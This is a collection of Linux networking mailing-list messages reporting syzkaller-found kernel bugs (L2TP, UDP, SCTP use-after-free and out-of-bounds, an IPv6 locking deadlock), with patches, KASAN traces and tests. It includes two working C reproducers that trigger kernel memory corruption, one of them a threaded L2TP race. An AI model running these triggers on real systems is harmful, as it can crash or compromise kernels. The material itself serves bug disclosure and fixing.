Re: net/l2tp:BUG: KASAN: use-after-free in l2tp_ip6_close
Hello Guillaume,
On 2016/11/17 5:07, Guillaume Nault wrote:
> On Wed, Nov 16, 2016 at 11:08:23AM -0800, Cong Wang wrote:
>> On Wed, Nov 16, 2016 at 8:30 AM, Guillaume Nault
>> wrote:
>>> diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c
>>> index fce25af..982f6c4 100644
>>> --- a/net/l2tp/l2tp_ip.c
>>> +++ b/net/l2tp/l2tp_ip.c
>>> @@ -251,8 +251,6 @@ static int l2tp_ip_bind(struct sock *sk, struct
>>> sockaddr *uaddr, int addr_len)
>>> int ret;
>>> int chk_addr_ret;
>>>
>>> - if (!sock_flag(sk, SOCK_ZAPPED))
>>> - return -EINVAL;
>>> if (addr_len < sizeof(struct sockaddr_l2tpip))
>>> return -EINVAL;
>>> if (addr->l2tp_family != AF_INET)
>>> @@ -267,6 +265,9 @@ static int l2tp_ip_bind(struct sock *sk, struct
>>> sockaddr *uaddr, int addr_len)
>>> read_unlock_bh(&l2tp_ip_lock);
>>>
>>> lock_sock(sk);
>>> + if (!sock_flag(sk, SOCK_ZAPPED))
>>> + goto out;
>>> +
>>> if (sk->sk_state != TCP_CLOSE || addr_len < sizeof(struct
>>> sockaddr_l2tpip))
>>> goto out;
>>>
>>> diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
>>> index ad3468c..9978d01 100644
>>> --- a/net/l2tp/l2tp_ip6.c
>>> +++ b/net/l2tp/l2tp_ip6.c
>>> @@ -269,8 +269,6 @@ static int l2tp_ip6_bind(struct sock *sk, struct
>>> sockaddr *uaddr, int addr_len)
>>> int addr_type;
>>> int err;
>>>
>>> - if (!sock_flag(sk, SOCK_ZAPPED))
>>> - return -EINVAL;
>>> if (addr->l2tp_family != AF_INET6)
>>> return -EINVAL;
>>> if (addr_len < sizeof(*addr))
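Review bot: In the second l2tp_ip.c hunk (@@ -267), the new `goto out` for a socket that is no longer SOCK_ZAPPED is taken without assigning `ret`, so the errno bind() reports in that case is whatever `ret` held before `read_unlock_bh()` — set earlier in the function, not visible in this hunk — whereas the early return the first hunk removes was an explicit -EINVAL. The l2tp_ip6.c hunk does `err = -EINVAL;` immediately before its SOCK_ZAPPED check, so the two implementations now diverge on a repeated bind(). Suggest adding `ret = -EINVAL;` as the line after `lock_sock(sk);` so an already-bound socket keeps failing with EINVAL rather than a stale status. l2tp_ip_bind() starts and ends outside these hunks.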
>>> @@ -296,6 +294,9 @@ static int l2tp_ip6_bind(struct sock *sk, struct
>>> sockaddr *uaddr, int addr_len)
>>> lock_sock(sk);
>>>
>>> err = -EINVAL;
>>> + if (!sock_flag(sk, SOCK_ZAPPED))
>>> + goto out_unlock;
>>> +
>>> if (sk->sk_state != TCP_CLOSE)
>>> goto out_unlock;
>>
>>
>> Makes sense, it should prevent a concurrent caller adding the socket
>> into bind table
>> twice after passing __l2tp_ip_bind_lookup() check.
>
> Yes, and the __l2tp_ip_bind_lookup() call is also racy. But, by
> properly checking the SOCK_ZAPPED flag, we probably can remove this
> call entirely.
>
> For now, I only wanted to make sure the issue was well identified. I'll
> submit a more complete patch for net (with protected SOCK_ZAPPED check
> in l2tp_ip_connect() too).
>
The patch fixes the issues both for l2tp_ip and l2tp_ip6
Tested-by: Baozeng Ding
Best Regards,
Baozeng Ding
Re: net/sctp: BUG: KASAN: stack-out-of-bounds in memcmp
On 2016/11/10 13:48, Xin Long wrote: > On Sat, Oct 15, 2016 at 4:28 PM, Baozeng Ding wrote: >> Hello Xin Long, >> >> On 2016/10/14 19:13, Xin Long wrote: >>> On Sat, Aug 20, 2016 at 3:51 PM, Baozeng Ding wrote: >>>> Hello all, >>>> The following program triggers stack-out-of-bounds in memcmp. The kernel >>>> version is 4.8.0-rc1+ (on Aug 13 commit >>>> 118253a593bd1c57de2d1193df1ccffe1abe745b). Thanks. >>> ... >>>> >>>> #define _GNU_SOURCE >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> >>>> int main() >>>> { >>>> int fd; >>>> mmap((void *)0x2000ul, 0xff2000ul, 0x3ul, 0x32ul, -1, 0x0ul); >>>> fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_SCTP); >>>> memcpy((void*)0x20f82f80, >>>> "\x0a\x00\xab\x12\x72\xd4\x19\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x85\xda\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >>>> 128); >>>> bind(fd, (struct sockaddr*)0x20f82f80ul, 0x80ul); >>>> *(uint64_t*)0x202e1fc8 = (uint64_t)0x20f77f80; >>>> *(uint32_t*)0x202e1fd0 = (uint32_t)0x80; >>>> *(uint64_t*)0x202e1fd8 = (uint64_t)0x20f7dfe0; >>>> *(uint64_t*)0x202e1fe0 = (uint64_t)0x2; >>>> *(uint64_t*)0x202e1fe8 = (uint64_t)0x20f77000; >>>> *(uint64_t*)0x202e1ff0 = (uint64_t)0x3; >>>> *(uint32_t*)0x202e1ff8 = (uint32_t)0x80; >>>> memcpy((void*)0x20f77f80, >>>> 
"\x0a\x00\xab\x12\xb0\xb3\x20\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc2\xc2\x0b\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >>>> 128); >>>> *(uint64_t*)0x20f7dfe0 = (uint64_t)0x20f77fc5; >>>> *(uint64_t*)0x20f7dfe8 = (uint64_t)0x3b; >>>> *(uint64_t*)0x20f7dff0 = (uint64_t)0x20f77fac; >>>> *(uint64_t*)0x20f7dff8 = (uint64_t)0x54; >>>> memcpy((void*)0x20f77fc5, >>>> "\xa5\x7d\xf3\xc4\xfe\xd3\xfd\x44\x63\x00\x8c\x1e\x4c\x2e\x8d\x8d\x9a\x9c\x9c\x9d\x5b\x7c\xe1\x06\xf7\x15\x16\xed\x68\xd1\xfc\xf4\xa4\x3a\xe4\x69\x51\x16\x74\xf4\x1a\xcf\x0e\x99\xc3\xa3\x87\xe7\x81\x6c\x10\x78\x75\x17\x69\x9d\x11\x0c\xc7", >>>> 59); >>>> memcpy((void*)0x20f77fac, >>>> "\x86\x08\x89\x3c\xf3\x58\xea\xe7\x64\x6a\xfb\xb5\xe8\xdd\x5f\x69\xa5\xd4\xdc\xd9\xe7\x71\x95\x07\x78\x7b\x21\xda\x43\x9c\x62\x4d\xca\x64\xb5\x6e\x96\x55\xe9\x58\x76\x66\x1d\xb9\x7b\xe6\x20\xc1\xa9\xed\x70\xc1\x2b\x7c\x86\x8c\xba\x28\xb3\x2c\xb9\x64\xb7\x84\x65\x0d\x7f\xa6\x98\x6f\x49\xcb\x35\xad\x5a\xdf\x13\x75\x99\x57\x7e\xbb\x38\x89", >>>> 84); >>>> *(uint64_t*)0x20f77000 = (uint64_t)0x15; >>>> *(uint32_t*)0x20f77008 = (uint32_t)0x1; >>>> *(uint32_t*)0x20f7700c = (uint32_t)0xfffe; >>>> *(uint8_t*)0x20f77010 = (uint8_t)0xbb; >>>> *(uint8_t*)0x20f77011 = (uint8_t)0x2; >>>> *(uint8_t*)0x20f77012 = (uint8_t)0x5; >>>> *(uint8_t*)0x20f77013 = (uint8_t)0x2; >>>> *(uint8_t*)0x20f77014 = (uint8_t)0x8000; >>>> *(uint64_t*)0x20f77015 = (uint64_t)0x10; >>>> *(uint32_t*)0x20f7701d = (uint32_t)0x; >>>> *(uint32_t*)0x20f77021 = (uint32_t)0x1; >>>> *(uint64_t*)0x20f77025 = (uint64_t)0x13; >>>> *(uint32_t*)0x20f7702d = (uint32_t)0x6; >>>> 
*(uint32_t*)0x20f77031 = (uint32_t)0xfe00; >>>> *(uint8_t*)0x20f77035 = (uint8_t)0x8000; >>>> *(uint8_t*)0x20f77036 = (uint8_t)0xfff8; >>>&g
Re: BUG: KASAN: use-after-free in udp_lib_get_port
fb fb fb fb fb fb fb 88002f163d00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ====== Best Regards, Baozeng Ding On 2016/10/17 3:53, Cong Wang wrote: > On Sun, Oct 16, 2016 at 6:46 AM, Baozeng Ding wrote: >> Hello all, >> While running syzkaller fuzzer I have got the following use-after-free >> bug in udp_lib_get_port. The kernel version is 4.8.0+ (on Oct 7 commit >> d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a >> reproducer for it. >> >> BUG: KASAN: use-after-free in udp_lib_get_port+0x1573/0x1860 at addr >> 88000804cb60 >> Write of size 8 by task syz-executor/31190 >> CPU: 0 PID: 31190 Comm: syz-executor Not tainted 4.8.0+ #39 >> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS >> rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 >> 880015ac7a48 829f835b 880032b531c0 88000804cb40 >> 88000804d250 880017415a4a 880015ac7a70 8174d3cc >> 880015ac7b00 88000804cb00 880032b531c0 880015ac7af0 >> Call Trace: >> [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 >> [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 >> [< inline >] print_address_description mm/kasan/report.c:194 >> [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 >> [< inline >] kasan_report mm/kasan/report.c:303 >> [] __asan_report_store8_noabort+0x3e/0x40 >> mm/kasan/report.c:329 >> [< inline >] hlist_add_head_rcu ./include/linux/rculist.h:487 >> [] udp_lib_get_port+0x1573/0x1860 net/ipv4/udp.c:345 >> [] udp_v6_get_port+0xa7/0xd0 net/ipv6/udp.c:106 >> [] inet6_bind+0x89c/0xfb0 net/ipv6/af_inet6.c:384 >> [] SYSC_bind+0x1ea/0x250 net/socket.c:1367 >> [] SyS_bind+0x24/0x30 net/socket.c:1353 >> [] entry_SYSCALL_64_fastpath+0x23/0xc6 > > > We should have a reference to this sock via fd and its sock->sk too, > so I fail to see why it could be freed while we holding this reference. > Maybe a VFS layer bug? 
> >> Object at 88000804cb40, in cache UDPv6 size: 1496 >> Allocated: >> PID = 30789 >> [ 378.305168] [] save_stack_trace+0x16/0x20 >> [ 378.305168] [] save_stack+0x46/0xd0 >> [ 378.305168] [] kasan_kmalloc+0xad/0xe0 >> [ 378.305168] [] kasan_slab_alloc+0x12/0x20 >> [ 378.305168] [< inline >] slab_post_alloc_hook mm/slab.h:417 >> [ 378.305168] [< inline >] slab_alloc_node mm/slub.c:2708 >> [ 378.305168] [< inline >] slab_alloc mm/slub.c:2716 >> [ 378.305168] [] kmem_cache_alloc+0xc8/0x2b0 >> mm/slub.c:2721 >> [ 378.305168] [] sk_prot_alloc+0x69/0x2b0 >> net/core/sock.c:1326 >> [ 378.305168] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 >> [ 378.305168] [] inet6_create+0x2d7/0x1000 >> net/ipv6/af_inet6.c:182 >> [ 378.305168] [] __sock_create+0x37b/0x640 >> net/socket.c:1153 >> [ 378.305168] [< inline >] sock_create net/socket.c:1193 >> [ 378.305168] [< inline >] SYSC_socket net/socket.c:1223 >> [ 378.305168] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 >> [ 378.305168] [] entry_SYSCALL_64_fastpath+0x23/0xc6 >> Freed: >> PID = 30789 >> [ 378.305168] [] save_stack_trace+0x16/0x20 >> [ 378.305168] [] save_stack+0x46/0xd0 >> [ 378.305168] [] kasan_slab_free+0x71/0xb0 >> [ 378.305168] [< inline >] slab_free_hook mm/slub.c:1352 >> [ 378.305168] [< inline >] slab_free_freelist_hook mm/slub.c:1374 >> [ 378.305168] [< inline >] slab_free mm/slub.c:2951 >> [ 378.305168] [] kmem_cache_free+0xc8/0x330 >> mm/slub.c:2973 >> [ 378.305168] [< inline >] sk_prot_free net/core/sock.c:1369 >> [ 378.305168] [] __sk_destruct+0x32b/0x4f0 >> net/core/sock.c:1444 >> [ 378.305168] [] sk_destruct+0x44/0x80 >> net/core/sock.c:1452 >> [ 378.305168] [] __sk_free+0x53/0x220 >> net/core/sock.c:1460 >> [ 378.305168] [] sk_free+0x23/0x30 net/core/sock.c:1471 >> [ 378.305168] [] sk_common_release+0x28c/0x3e0 >> ./include/net/sock.h:1589 >> [ 378.305168] [] udp_lib_close+0x15/0x20 >> ./include/net/udp.h:203 >> [ 378.305168] [] inet_release+0xed/0x1c0 >> net/ipv4/af_inet.c:415 >> [ 378.305168] [] 
inet6_release+0x50/0x70 >> net/ipv6/af_inet6.c:422 >> [ 378.305168] [] sock_release+0x8d/0x1d0 net/socket.c:570 >> [ 378.305168] [] sock_close+0x16/0x20 net/socket.c:1017 >> [ 378.305168] [] __fput+0x28c/0x780 fs/file_table.c:208 >> [ 378.305168] [
Re: net/l2tp:BUG: KASAN: use-after-free in l2tp_ip6_close
This use-after-free seems to be triggered by some race. I use stress tool for this: https://github.com/golang/tools/blob/master/cmd/stress/stress.go
If you have Go toolchain installed, then the following will do:
$ go get golang.org/x/tools/cmd/stress
$ stress ./a.out
=
/*
 * Reproducer for the L2TP/IP socket use-after-free reported below.
 *
 * One AF_INET / IPPROTO_L2TP datagram socket is shared through the global
 * `fd` by four threads that race socket() / bind() / bind() / connect()
 * against each other; main() then returns without joining them, so the
 * process exits while those calls may still be inside the kernel.
 *
 * The list archive stripped the header names from the #include lines
 * below. Judging by the names used (pthread_create, usleep, socket, bind,
 * connect, IPPROTO_L2TP, struct sockaddr_l2tpip) the program presumably
 * needs the pthread, unistd, sys/socket, netinet/in and linux/l2tp
 * headers — restore them before building.
 *
 * NOTE(review): whether an unprivileged process can open an IPPROTO_L2TP
 * socket decides the impact of this reproducer — confirm against the
 * capability check in inet_create() for the running kernel.
 */
#include
#include
#include
#include
#include
#include

/* Socket descriptor written by thread 0 and read by the other three
 * threads with no synchronisation; the second round of threads reuses it. */
int fd;

/* L2TP/IP address with connection id 8 and a zero (any) IPv4 address; the
 * same address is handed to both bind() calls and to connect(). */
struct sockaddr_l2tpip sock_addr = {
	.l2tp_family = AF_INET,
	.l2tp_unused = 0,
	.l2tp_addr = 0,
	.l2tp_conn_id = 8,
	.__pad = 0
};

/* Thread body: `arg` (0..3) selects the syscall this thread issues.
 * Return values are deliberately ignored — a failing bind()/connect() is
 * part of the interleaving being exercised. 0x10 is the address length
 * passed to all three calls (presumably sizeof(struct sockaddr_l2tpip)). */
void *thr(void *arg)
{
	switch ((long)arg) {
	case 0:
		fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_L2TP);
		break;
	case 1:
		bind(fd, (struct sockaddr*) &sock_addr, 0x10ul);
		break;
	case 2:
		bind(fd, (struct sockaddr*)&sock_addr, 0x10ul);
		break;
	case 3:
		connect(fd, (struct sockaddr*)&sock_addr, 0x10ul);
		break;
	}
	return 0;
}

/* Spawns the four workers twice with slightly different spacing and exits
 * after 10 us without pthread_join(). `n` is unused and `th[]` is
 * overwritten by the second round — presumably leftovers of the generated
 * program; do not "fix" the missing join, since the KASAN trace below shows
 * the freeing close() running from do_exit(), which suggests exiting while
 * the workers are still in bind()/connect() is part of the trigger. */
int main()
{
	long i;
	pthread_t th[4];
	int n;

	/* First round: one thread per syscall, 1 us apart. */
	for (i = 0; i < 4; i++) {
		pthread_create(&th[i], 0, thr, (void*)i);
		usleep(1);
	}
	/* Second round against the same fd, pausing only after the
	 * even-numbered threads to shift the interleaving. */
	for (i = 0; i < 4; i++) {
		pthread_create(&th[i], 0, thr, (void*)i);
		if (i%2==0) usleep(1);
	}
	/* No join: let the process exit while workers may still be running. */
	usleep(10);
	return 0;
}
On 2016/10/17 3:50, Cong Wang wrote:
> On Sun, Oct 16, 2016 at 8:07 AM, Baozeng Ding wrote:
>> Hello,
>> While running syzkaller fuzzer I have got the following use-after-free
>> bug in l2tp_ip6_close. The kernel version is 4.8.0+ (on Oct 7 commit
>> d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0).
>> >> BUG: KASAN: use-after-free in l2tp_ip6_close+0x22e/0x290 at addr >> 8800081b0ed8 >> Write of size 8 by task syz-executor/10987 >> CPU: 0 PID: 10987 Comm: syz-executor Not tainted 4.8.0+ #39 >> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS >> rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 >> 880031d97838 829f835b 88001b5a1640 8800081b0ec0 >> 8800081b15a0 8800081b6d20 880031d97860 8174d3cc >> 880031d978f0 8800081b0e80 88001b5a1640 880031d978e0 >> Call Trace: >> [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 >> [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 >> [< inline >] print_address_description mm/kasan/report.c:194 >> [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 >> [< inline >] kasan_report mm/kasan/report.c:303 >> [] __asan_report_store8_noabort+0x3e/0x40 >> mm/kasan/report.c:329 >> [< inline >] __write_once_size ./include/linux/compiler.h:249 >> [< inline >] __hlist_del ./include/linux/list.h:622 >> [< inline >] hlist_del_init ./include/linux/list.h:637 >> [] l2tp_ip6_close+0x22e/0x290 net/l2tp/l2tp_ip6.c:239 > > > This one looks pretty interesting, how the hell could we call fput() twice > on the same fd... 
> > >> [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 >> [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 >> [] sock_release+0x8d/0x1d0 net/socket.c:570 >> [] sock_close+0x16/0x20 net/socket.c:1017 >> [] __fput+0x28c/0x780 fs/file_table.c:208 >> [] fput+0x15/0x20 fs/file_table.c:244 >> [] task_work_run+0xf9/0x170 >> [] do_exit+0x85e/0x2a00 >> [] do_group_exit+0x108/0x330 >> [] get_signal+0x617/0x17a0 kernel/signal.c:2307 >> [] do_signal+0x7f/0x18f0 >> [] exit_to_usermode_loop+0xbf/0x150 >> arch/x86/entry/common.c:156 >> [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 >> [] syscall_return_slowpath+0x1a0/0x1e0 >> arch/x86/entry/common.c:259 >> [] entry_SYSCALL_64_fastpath+0xc4/0xc6 >> Object at 8800081b0ec0, in cache L2TP/IPv6 size: 1448 >> Allocated: >> PID = 10987 >> [ 1116.897025] [] save_stack_trace+0x16/0x20 >> [ 1116.897025] [] save_stack+0x46/0xd0 >> [ 1116.897025] [] kasan_kmalloc+0xad/0xe0 >> [ 1116.897025] [] kasan_slab_alloc+0x12/0x20 >> [ 1116.897025] [< inline >] slab_post_alloc_hook mm/slab.h:417 >> [ 1116.897025] [< inline >] slab_alloc_node mm/slub.c:2708 >> [ 1116.897025] [< inline >] slab_alloc mm/slub.c:2716 >> [ 1116.897025] [] kmem_cache_alloc+0xc8/0x2b0 >> mm/slub.c:2721 >> [ 1116.897025] [] sk_prot_alloc+0x69/0x2b0 >> net/core/sock.c:1326 >> [ 1116.897025] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 >> [ 1116.897025]
Re: net/ipv6: potential deadlock in do_ipv6_setsockopt
It fixes the issue for me.
Tested-by: Baozeng Ding
On 2016/10/17 17:54, Baozeng Ding wrote:
> Applied the patch to my test tree. I will tell you the result a few days
> later. Thank you.
>
> On 2016/10/17 2:50, Cong Wang wrote:
>> On Sun, Oct 16, 2016 at 6:34 AM, Baozeng Ding wrote:
>>> Possible unsafe locking scenario:
>>>
>>>        CPU0                    CPU1
>>>   lock(sk_lock-AF_INET6);
>>>                                lock(rtnl_mutex);
>>>                                lock(sk_lock-AF_INET6);
>>>   lock(rtnl_mutex);
>>>
>>> *** DEADLOCK ***
>>
>> This is caused by the conditional rtnl locking in do_ipv6_setsockopt().
>> It looks like we miss the case of IPV6_ADDRFORM.
>>
>> Please try the attached patch.
>>
Re: net/ipv6: potential deadlock in do_ipv6_setsockopt
It fixes the issue for me.
Tested-by: Baozeng Ding
On 2016/10/17 17:54, Baozeng Ding wrote:
> Applied the patch to my test tree. I will tell you the result a few days
> later. Thank you.
>
> On 2016/10/17 2:50, Cong Wang wrote:
>> On Sun, Oct 16, 2016 at 6:34 AM, Baozeng Ding wrote:
>>> Possible unsafe locking scenario:
>>>
>>>        CPU0                    CPU1
>>>   lock(sk_lock-AF_INET6);
>>>                                lock(rtnl_mutex);
>>>                                lock(sk_lock-AF_INET6);
>>>   lock(rtnl_mutex);
>>>
>>> *** DEADLOCK ***
>>
>> This is caused by the conditional rtnl locking in do_ipv6_setsockopt().
>> It looks like we miss the case of IPV6_ADDRFORM.
>>
>> Please try the attached patch.
>>
Re: BUG: KASAN: use-after-free in udp_lib_get_port
8 by task syz-executor/13522 CPU: 1 PID: 13522 Comm: syz-executor Tainted: GB 4.8.0+ #41 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 88002e4e77e0 829f835b 88002f488b40 88002f163c40 88002f164350 880031781540 88002e4e7808 8174d3cc 88002e4e7898 88002f163c00 88002f488b40 88002e4e7888 Call Trace: [] dump_stack+0xb3/0x118 /lib/dump_stack.c:15 [] kasan_object_err+0x1c/0x70 /mm/kasan/report.c:156 [< inline >] print_address_description /mm/kasan/report.c:194 [] kasan_report_error+0x1f6/0x4d0 /mm/kasan/report.c:283 [< inline >] kasan_report /mm/kasan/report.c:303 [] __asan_report_store8_noabort+0x3e/0x40 /mm/kasan/report.c:329 [< inline >] hlist_del_init_rcu /./include/linux/list.h:624 [] udp_lib_unhash+0x593/0x660 /net/ipv4/udp.c:1391 [] sk_common_release+0xbd/0x3e0 /net/core/sock.c:2719 [] udp_lib_close+0x15/0x20 /./include/net/udp.h:203 [] inet_release+0xed/0x1c0 /net/ipv4/af_inet.c:415 [] sock_release+0x8d/0x1d0 /net/socket.c:570 [] sock_close+0x16/0x20 /net/socket.c:1017 [] __fput+0x28c/0x780 /fs/file_table.c:208 [] fput+0x15/0x20 /fs/file_table.c:244 [] task_work_run+0xf9/0x170 [] do_exit+0x85e/0x2a00 [] do_group_exit+0x108/0x330 [] get_signal+0x617/0x17a0 /kernel/signal.c:2307 [] do_signal+0x7f/0x18f0 [] exit_to_usermode_loop+0xbf/0x150 /arch/x86/entry/common.c:156 [< inline >] prepare_exit_to_usermode /arch/x86/entry/common.c:190 [] syscall_return_slowpath+0x1a0/0x1e0 /arch/x86/entry/common.c:259 [] entry_SYSCALL_64_fastpath+0xc4/0xc6 Object at 88002f163c40, in cache UDPv6 size: 1496 Allocated: PID = 13255 [ 1773.617936] [] save_stack_trace+0x16/0x20 [ 1773.617936] [] save_stack+0x46/0xd0 [ 1773.617936] [] kasan_kmalloc+0xad/0xe0 [ 1773.617936] [] kasan_slab_alloc+0x12/0x20 [ 1773.617936] [< inline >] slab_post_alloc_hook /mm/slab.h:417 [ 1773.617936] [< inline >] slab_alloc_node /mm/slub.c:2708 [ 1773.617936] [< inline >] slab_alloc /mm/slub.c:2716 [ 1773.617936] [] kmem_cache_alloc+0xc8/0x2b0 
/mm/slub.c:2721 [ 1773.617936] [] sk_prot_alloc+0x69/0x2b0 /net/core/sock.c:1326 [ 1773.617936] [] sk_alloc+0x38/0xae0 /net/core/sock.c:1388 [ 1773.617936] [] inet6_create+0x2d7/0x1000 /net/ipv6/af_inet6.c:182 [ 1773.617936] [] __sock_create+0x37b/0x640 /net/socket.c:1153 [ 1773.617936] [< inline >] sock_create /net/socket.c:1193 [ 1773.617936] [< inline >] SYSC_socket /net/socket.c:1223 [ 1773.617936] [] SyS_socket+0xef/0x1b0 /net/socket.c:1203 [ 1773.617936] [] entry_SYSCALL_64_fastpath+0x23/0xc6 Freed: PID = 13261 [ 1773.617936] [] save_stack_trace+0x16/0x20 [ 1773.617936] [] save_stack+0x46/0xd0 [ 1773.617936] [] kasan_slab_free+0x71/0xb0 [ 1773.617936] [< inline >] slab_free_hook /mm/slub.c:1352 [ 1773.617936] [< inline >] slab_free_freelist_hook /mm/slub.c:1374 [ 1773.617936] [< inline >] slab_free /mm/slub.c:2951 [ 1773.617936] [] kmem_cache_free+0xc8/0x330 /mm/slub.c:2973 [ 1773.617936] [< inline >] sk_prot_free /net/core/sock.c:1369 [ 1773.617936] [] __sk_destruct+0x32b/0x4f0 /net/core/sock.c:1444 [ 1773.617936] [] sk_destruct+0x44/0x80 /net/core/sock.c:1452 [ 1773.617936] [] __sk_free+0x53/0x220 /net/core/sock.c:1460 [ 1773.617936] [] sk_free+0x23/0x30 /net/core/sock.c:1471 [ 1773.617936] [] sk_common_release+0x28c/0x3e0 /./include/net/sock.h:1589 [ 1773.617936] [] udp_lib_close+0x15/0x20 /./include/net/udp.h:203 [ 1773.617936] [] inet_release+0xed/0x1c0 /net/ipv4/af_inet.c:415 [ 1773.617936] [] inet6_release+0x5a/0x80 /net/ipv6/af_inet6.c:424 [ 1773.617936] [] sock_release+0x8d/0x1d0 /net/socket.c:570 [ 1773.617936] [] sock_close+0x16/0x20 /net/socket.c:1017 [ 1773.617936] [] __fput+0x28c/0x780 /fs/file_table.c:208 [ 1773.617936] [] fput+0x15/0x20 /fs/file_table.c:244 [ 1773.617936] [] task_work_run+0xf9/0x170 [ 1773.617936] [] do_exit+0x85e/0x2a00 [ 1773.617936] [] do_group_exit+0x108/0x330 [ 1773.617936] [] get_signal+0x617/0x17a0 /kernel/signal.c:2307 [ 1773.617936] [] do_signal+0x7f/0x18f0 [ 1773.617936] [] exit_to_usermode_loop+0xbf/0x150 
/arch/x86/entry/common.c:156 [ 1773.617936] [< inline >] prepare_exit_to_usermode /arch/x86/entry/common.c:190 [ 1773.617936] [] syscall_return_slowpath+0x1a0/0x1e0 /arch/x86/entry/common.c:259 [ 1773.617936] [] entry_SYSCALL_64_fastpath+0xc4/0xc6 Memory state around the buggy address: 88002f163b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88002f163b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88002f163c00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 88002f163c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88002f163d00: fb fb fb fb fb fb fb fb fb fb
Re: net/ipv6: potential deadlock in do_ipv6_setsockopt
Applied the patch to my test tree. I will tell you the result a few days later. Thank you.
On 2016/10/17 2:50, Cong Wang wrote:
> On Sun, Oct 16, 2016 at 6:34 AM, Baozeng Ding wrote:
>> Possible unsafe locking scenario:
>>
>>        CPU0                    CPU1
>>   lock(sk_lock-AF_INET6);
>>                                lock(rtnl_mutex);
>>                                lock(sk_lock-AF_INET6);
>>   lock(rtnl_mutex);
>>
>> *** DEADLOCK ***
>
> This is caused by the conditional rtnl locking in do_ipv6_setsockopt().
> It looks like we miss the case of IPV6_ADDRFORM.
>
> Please try the attached patch.
>
net/l2tp:BUG: KASAN: use-after-free in l2tp_ip6_close
fc fc fc fc fc fc fc fc fc fc 8800081b0e00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >8800081b0e80: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 8800081b0f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 8800081b0f80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb == Best Regards, Baozeng Ding
BUG: KASAN: use-after-free in udp_lib_rehash
Hello all, While running syzkaller fuzzer I have got the following use-after-free bug in udp_lib_rehash. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a reproducer for it. BUG: KASAN: use-after-free in udp_lib_rehash+0x634/0x640 at addr 88002f3fe1e0 Write of size 8 by task syz-executor/11156 CPU: 3 PID: 11156 Comm: syz-executor Not tainted 4.8.0+ #39 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 88001acb7b58 829f835b 880034acd900 88002f3fe1c0 88002f3fe8d0 c9230810 88001acb7b80 8174d3cc 88001acb7c10 88002f3fe180 880034acd900 88001acb7c00 Call Trace: [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 [< inline >] print_address_description mm/kasan/report.c:194 [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 [< inline >] kasan_report mm/kasan/report.c:303 [] __asan_report_store8_noabort+0x3e/0x40 mm/kasan/report.c:329 [< inline >] hlist_add_head_rcu ./include/linux/rculist.h:487 [] udp_lib_rehash+0x634/0x640 net/ipv4/udp.c:1429 [] udp_v6_rehash+0x72/0xa0 net/ipv6/udp.c:115 [] ip6_datagram_connect+0x786/0xc40 [] inet_dgram_connect+0x112/0x1f0 